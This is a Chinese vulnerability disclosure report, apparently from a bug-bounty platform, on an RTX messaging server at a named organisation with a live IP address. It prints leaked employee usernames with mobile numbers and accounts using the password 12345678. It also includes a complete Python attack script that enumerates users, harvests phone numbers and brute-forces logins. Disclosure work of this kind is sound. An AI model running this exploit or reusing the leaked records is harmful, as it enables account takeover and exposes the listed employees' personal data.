2014-01-11: 细节已通知厂商并且等待厂商处理中 2014-01-16: 厂商已经确认,细节仅向厂商公开 2014-01-26: 细节向核心白帽子及相关领域专家公开 2014-02-05: 细节向普通白帽子公开 2014-02-15: 细节向实习白帽子公开 2014-02-25: 细节向公众公开
rtx server 存在暴露用户信息的漏洞,通过web访问
http://123.127.50.2:8012/userlist.php #泄漏公司所有rtx用户http://123.127.50.2:8012/getmobile.cgi?receiver= #泄漏用户手机号http://123.127.50.2:8012/check.php #验证弱口令
2250 zhangs 136833229352251 caob 135010985192252 luowb 135221449772253 lux 135229720582254 guihs 186117118552256 chengy 134010180262257 liuwei 130021550942258 lvjg 186118347892259 yaojr 137187221302260 sunqian 132604830722262 zhangjy 150100829582263 zhangp 139107093812264 xusong 132401886382266 liangt 139013859042267 jiangsh 134663191322269 wangyn 139103976792270 xianjh 136711822302271 zhaox 159108327902272 shaozh 135202750772274 weisw 131204526272275 louln 136613104802276 sunqx 139103230732277 zhangyan 137184300852278 zhangsuy 136110118052281 jinll 130110990302282 wancx 135011079092283 liudw 139107691152284 liuzw 158111287832285 wanghui 13466711828...... 共940+条记录
弱口令可登录Brute force starting....Please input the number of threads for brute force(default 10) : And it will take a little time ...username passwordzhangm 12345678songdj 12345678haoxq 12345678yuy 12345678jianghb 12345678tongl 12345678yinzy 12345678sunyb 12345678wangmz 12345678wancx 12345678liudw 12345678yulei 12345678wanghui 12345678xuelei 12345678xuyc 12345678liuf 12345678chenye 12345678mahong 12345678liuzx 12345678liuyy 12345678changh 12345678zhuanggw 12345678zhangj02 12345678zhangd 12345678wangk 12345678sungr 12345678chengxf 12345678guyu 12345678hexw 12345678wangqi 12345678
rtx check脚本
#!/usr/bin/env python#-*-coding=utf-8-*-# date : 2013.12.16# rtx hackimport threadingimport urllibimport reimport sysimport getoptimport jsonimport threadingimport httplibimport timedef usage(): print '''Usage : ./f.py -u target_ip-h Show this page!'''class postThread(threading.Thread): def __init__(self, data): threading.Thread.__init__(self) self.data = data def run(self): for x in self.data: try: print self.data except Exception, e: print e class rtx(object): 'rtx attacker class' ip = '' data = '' port = '8012' fullData = '' def __init__(self, ip): if self.checkIp(ip): self.ip = ip url = "http://"+ip+":"+self.port+"/userlist.php" try: content = urllib.urlopen(url).read() self.data = json.loads(content) except (IOError,ValueError),e: print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!" sys.exit() self.checkVulnerable() #print self.data self.checkPhone() self.bruteforce() else: print " ______________" print " \033[07m are you kidding me? \033[27m " print " \ " print " \ \033[1;31m,__,\033[1;m " print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m " print " \033[1;31m(__) )\ \033[1;m " print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n" @staticmethod def checkIp(ip): pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" if re.match(pattern, ip): return True else: return False def checkVulnerable(self): print "\033[1;31m Oh...I got something!!" print " Please wait a bit....." #for x in range(len(self.data)): # print self.data[x] print " "+str(len(self.data))+" records was found!! \033[0m" def checkPhone(self): print "\033[1;31m Now check phone number in records.....\033[0m" url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver=" output = file('out.txt','w') for x in xrange(0,len(self.data)): url2 = url + self.data[x]['name'] self.data[x]['phone'] = urllib.urlopen(url2).read() try: output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n') print self.data[x] except Exception,e: print e output.close() print "\033[1;31m put the records int out.txt\033[0m" #print self.data def bruteforce(self): print "\033[1;31m Brute force starting...." num = raw_input(" Please input the number of threads for brute force(default 10) : ") print " And it will take a little time ...\033[0m" if num == '': num = 10 else : try : num = int(num) except ValueError,e: print e sys.exit() if (num < 1) or (num > 15): print "threads must in 1-15" sys.exit() threads = []; block = len(self.data)/num for i in xrange(0, num): if i == num-1: data = self.data[block*i:] else: data = self.data[i*block:(i+1)*block] t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data)) threads.append(t) for i in threads: i.start() @staticmethod def fwork(port,ip,b): for x in xrange(0,len(b)): dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666'] #dicts.append(b[x]['phone']) dicts.append(b[x]['name']) for x in dicts: httpClient = None try: name = dicts[-1] postData = urllib.urlencode({'user':name,'pwd':x}) headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}; httpClient = httplib.HTTPConnection(ip, port, timeout=30) httpClient.request("POST", "/check.php", postData, headers) response = httpClient.getresponse() responseHeader = response.getheaders() if responseHeader[1][1] == '2573': print name,x except Exception, e: print e finally: httpClient.close() def getWeakPass(self): file_ob = open("password.txt") try: list_file = file_ob.readlines() finally: file_ob.close() for x in list_file: self.dists.append(x.strip('\n'))def main(): try: opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"]) except getopt.GetoptError: usage() sys.exit() for o,a in opts: if o in ("-h", "--help"): usage() elif o == "-u": r = rtx(a) else : usage() if len(opts) == 0: usage() if __name__ == "__main__" : main()
危害等级:高
漏洞Rank:16
确认时间:2014-01-16 09:14
CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道通报给中国建筑设计研究院处置。
暂无